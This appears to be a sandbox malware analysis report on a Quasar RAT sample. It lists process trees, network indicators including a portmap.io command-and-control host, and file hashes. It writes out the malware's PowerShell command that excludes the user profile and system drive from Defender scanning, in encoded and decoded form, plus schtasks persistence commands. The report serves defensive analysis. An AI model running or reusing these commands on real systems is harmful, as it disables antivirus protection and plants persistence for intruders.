Malware Analysis Report

2025-04-14 05:06

Sample ID: 230109-rra2ksee42
Target: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
SHA256: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5
Tags: quasar office04 spyware trojan
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5

Threat Level: Known bad

The file 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe was found to be: Known bad.

Malicious Activity Summary

quasar office04 spyware trojan

Quasar RAT

Quasar payload

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-01-09 14:25

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2023-01-09 14:25
Reported: 2023-01-09 14:27
Platform: win10v2004-20220901-en
Max time kernel: 137s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

5 payload detections (no description, indicator, process or target recorded; all fields N/A)

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
N/A | N/A | C:\Program Files (x86)\SubDir\Java.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | C:\Program Files (x86)\SubDir\Java.exe | N/A
File opened for modification | C:\Program Files (x86)\SubDir | C:\Program Files (x86)\SubDir\Java.exe | N/A
File created | C:\Program Files (x86)\SubDir\Java.exe | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\SubDir\Java.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\SubDir\Java.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 848 wrote to memory of 4024 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 2408 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 2116 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 2116 wrote to memory of 4308 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2116 wrote to memory of 4056 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | C:\Program Files (x86)\SubDir\Java.exe
PID 4056 wrote to memory of 2984 (3 events) | N/A | C:\Program Files (x86)\SubDir\Java.exe | C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command not preserved in this copy of the report]"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="

Decoded -EncodedCommand (UTF-16LE base64, decoded for this edition; not part of the sandbox output): <#ufs#>Add-MpPreference <#vic#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uiw#> -Force <#txk#>
The <#...#> block comments are padding; the effective command adds the user profile and the whole system drive to the Microsoft Defender exclusion list, which is why the dropped Client-built.exe and Java.exe are written and executed without being scanned.

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f

C:\Program Files (x86)\SubDir\Java.exe

"C:\Program Files (x86)\SubDir\Java.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f

Network

Country | Destination | Domain | Proto | Connections
N/A | 8.8.8.8:53 | ip-api.com | udp | 1
N/A | 208.95.112.1:80 | ip-api.com | tcp | 2
N/A | 192.168.0.125:4782 | N/A | tcp | 5
N/A | 209.197.3.8:80 | N/A | tcp | 4
N/A | 104.80.225.205:443 | N/A | tcp | 1
N/A | 20.189.173.12:443 | N/A | tcp | 1
N/A | 8.8.8.8:53 | AeroNaut-25032.portmap.io | udp | 1
N/A | 193.161.193.99:25032 | AeroNaut-25032.portmap.io | tcp | 4

Files

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba4f16a3fe5704136d34f3c9fa04d896
SHA1 5d2d6a763b61c5338583194d869171a7af14bafc
SHA256 7f684196a3f6e786bed918870e0c3c84575991224b138b93a327de9ed249a03c
SHA512 eccf2335489ea553201eec9c74149fba004adf1e450912a5e73a75bd713d8fb9b3bde2f84a15d0b2e296cfb2feacc10bb3e9c37d3b87bf95c5371aff29ddb0d0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4cc9e7069534f7bcbb90ad7cac69ed78
SHA1 a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892
SHA256 4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c
SHA512 e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Analysis: behavioral1

Detonation Overview

Submitted: 2023-01-09 14:25
Reported: 2023-01-09 14:27
Platform: win7-20220812-en
Max time kernel: 126s
Max time network: 139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

8 payload detections (no description, indicator, process or target recorded; all fields N/A)

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
N/A | N/A | C:\Program Files (x86)\SubDir\Java.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\SubDir\Java.exe | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | C:\Program Files (x86)\SubDir\Java.exe | N/A
File opened for modification | C:\Program Files (x86)\SubDir | C:\Program Files (x86)\SubDir\Java.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\SubDir\Java.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\SubDir\Java.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1088 wrote to memory of 304 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 932 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 820 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 820 wrote to memory of 668 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | C:\Windows\SysWOW64\schtasks.exe
PID 820 wrote to memory of 1996 (7 events) | N/A | C:\Users\Admin\AppData\Local\Temp\Client-built.exe | C:\Program Files (x86)\SubDir\Java.exe
PID 1996 wrote to memory of 2012 (4 events) | N/A | C:\Program Files (x86)\SubDir\Java.exe | C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command not preserved in this copy of the report]"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="

Decoded -EncodedCommand (UTF-16LE base64, decoded for this edition; not part of the sandbox output): <#ufs#>Add-MpPreference <#vic#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uiw#> -Force <#txk#>
Same Defender exclusion as in the behavioral2 run: the user profile and the system drive are excluded from scanning before the payload is dropped.

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f

C:\Program Files (x86)\SubDir\Java.exe

"C:\Program Files (x86)\SubDir\Java.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f

Network

Country | Destination | Domain | Proto | Connections
N/A | 8.8.8.8:53 | ip-api.com | udp | 1
N/A | 208.95.112.1:80 | ip-api.com | tcp | 2
N/A | 192.168.0.125:4782 | N/A | tcp | 4
N/A | 8.8.8.8:53 | AeroNaut-25032.portmap.io | udp | 1
N/A | 193.161.193.99:25032 | AeroNaut-25032.portmap.io | tcp | 3

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 09491f53829b6a3bab13fb0e98fab068
SHA1 815480a0cf434ac34ddd7bc031066ed14687395c
SHA256 257644182d9199a83598c76c73f9418ad4697c585e3192fedaaee8332710cc23
SHA512 dd487a30ad1fe189b9fc4cbc4db2df23c0ecc0b259f5c3209c1ba85f8646f1c615ca0a2567af1dfe5efccae8227b4eb592aca7b9b9a3668dc7ccfa3e54e81adc

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
